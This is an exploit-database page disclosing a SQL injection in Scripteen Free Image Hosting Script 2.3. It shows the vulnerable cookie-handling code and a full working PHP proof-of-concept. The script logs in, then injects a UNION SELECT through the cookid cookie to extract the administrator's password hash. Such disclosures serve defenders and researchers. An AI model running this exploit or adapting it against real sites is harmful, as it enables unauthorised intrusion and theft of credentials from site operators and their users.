Scripteen Free Image Hosting Script 2.3 SQL Injection Exploit

2009.08.23
Credit: Coksnuss
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

=================== Scripteen Free Image Hosting Script v2.3 SQL Injection vulnerable =================== The vulnerable: header.php (line 53-62) $userid=$_SESSION['userid']; $usergid=$_SESSION['usergid']; if (!$userid || empty($userid) || $userid==""){ $userid = $_COOKIE['cookid']; } if (!$usergid || empty($usergid) || $usergid==""){ $usergid = $_COOKIE['cookgid']; } As you can see $_COOKIE['cookid'] and $_COOKIE['cookgid'] is not filtered and can be used to do an SQL Injection =================== Proof of concept =================== <?php // ************************************* // Global variables // ************************************* $g_arguments = getArguments(); $g_url = isset($g_arguments['url']) ? $g_arguments['url'] : false; $g_username = isset($g_arguments['username']) ? $g_arguments['username'] : false; $g_password = isset($g_arguments['password']) ? $g_arguments['password'] : false; // ************************************* // ************************************* // Print help // ************************************* if(isset($g_arguments['help']) || $g_url === false || $g_username === false || $g_password === false) { echo "###################################\n"; echo "# \n"; echo "# Scripteen Free Image Hosting V2.3\n"; echo "# SQL Injection Exploit \n"; echo "# Discovered by Coksnuss \n"; echo "# POC script by Coksnuss \n"; echo "# \n"; echo "###################################\n"; echo "Usage: " . $argv[0] . "\n"; echo "\t--help - This help\n"; echo "\t--url=[STR] - URL of a vulnerable site (e.g. http://www.host.de/path/to/script)\n"; echo "\t--username=[STR] - A valid username to login\n"; echo "\t--password=[STR] - A valid password to login\n"; die(); } // ************************************* // ************************************* // Main // ************************************* $url = strpos($g_url, '.php') !== false ? dirname($g_url) : $g_url; if(substr($url, -1, 1) == '/' ) $url = substr($url, 0, -1); // Get Cookie echo "Generate cookie..."; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $g_url . '/login.php'); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEJAR, dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt'); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, 'uname=' . urlencode($g_username) . '&pass=' . urlencode($g_password)); $ret = curl_exec($curl); curl_close($curl); preg_match_all('/([\d]{1}[.][\d]{1})/', $ret, $matches); if(!array_search('2.3', $matches[1])) echo("\nWarning: It seems like this site do not use version 2.3 of the Scripteen Free Image Hosting Script!\n"); if(!file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt')) die('Be sure that you\'ve enabled CURL and have write permission in the script directory!'); echo "DONE\n"; // Get userid echo "Get userid..."; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $g_url . '/profile.php'); curl_setopt($curl, CURLOPT_COOKIEFILE, dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt'); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $ret = curl_exec($curl); curl_close($curl); if(!preg_match('/<input type="hidden" name="userid" id="userid" value="([\d]{1,3})"/', $ret, $match)) die('Couldn\'t retrieve userid! Check your login data again!'); $userid = $match[1]; echo "DONE (" . $userid . ")\n"; // Get the password hash from userid 1 echo "Get the passwordhash from userid 1...\n"; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $g_url . '/profile.php'); curl_setopt($curl, CURLOPT_COOKIE, 'cookid=' . $userid . ' UNION SELECT 1,2,password,4,5,6,7,8,9,10,11 FROM users WHERE userid=1; cookgid=3; cookname=' . urlencode($g_username) . '; cookpass=' . md5($g_password)); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $ret = curl_exec($curl); curl_close($curl); if(!preg_match('/<input type="text" name="uname" id="uname" value="([a-z0-9]{32})"/', $ret, $match)) die('Couldn\'t find the password hash!'); echo "Hash found: " . $match[1] . "\n"; // ************************************* // ************************************* // Global functions // ************************************* function getArguments() { global $argv; foreach($argv as $arg) { if(substr($arg, 0, 2) == '--') { // In case its an arguments (e.g. --arg='1') if(($pos = strpos($arg, '=')) !== false) { $name = substr($arg, 2, ($pos - 2)); $value = substr($arg, ($pos + 1)); $args[$name] = $value; // Or just a flag (e.g. --help) } else { $name = substr($arg, 2); $args[$name] = true; } } else if($arg == $argv[0]) { $args[0] = $argv[0]; } } return $args; } // ************************************* ?>

References:

http://www.scripteen.com/forum/news-announcements-f2-scripteen-free-image-hosting-script-v2-4-t766.html
http://www.securityfocus.com/bid/35800
http://www.scripteen.com/forum/bug-reports-f15-my-image-hosting-site-got-hacked-t764.html
http://www.milw0rm.com/exploits/9252
http://secunia.com/advisories/35976


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top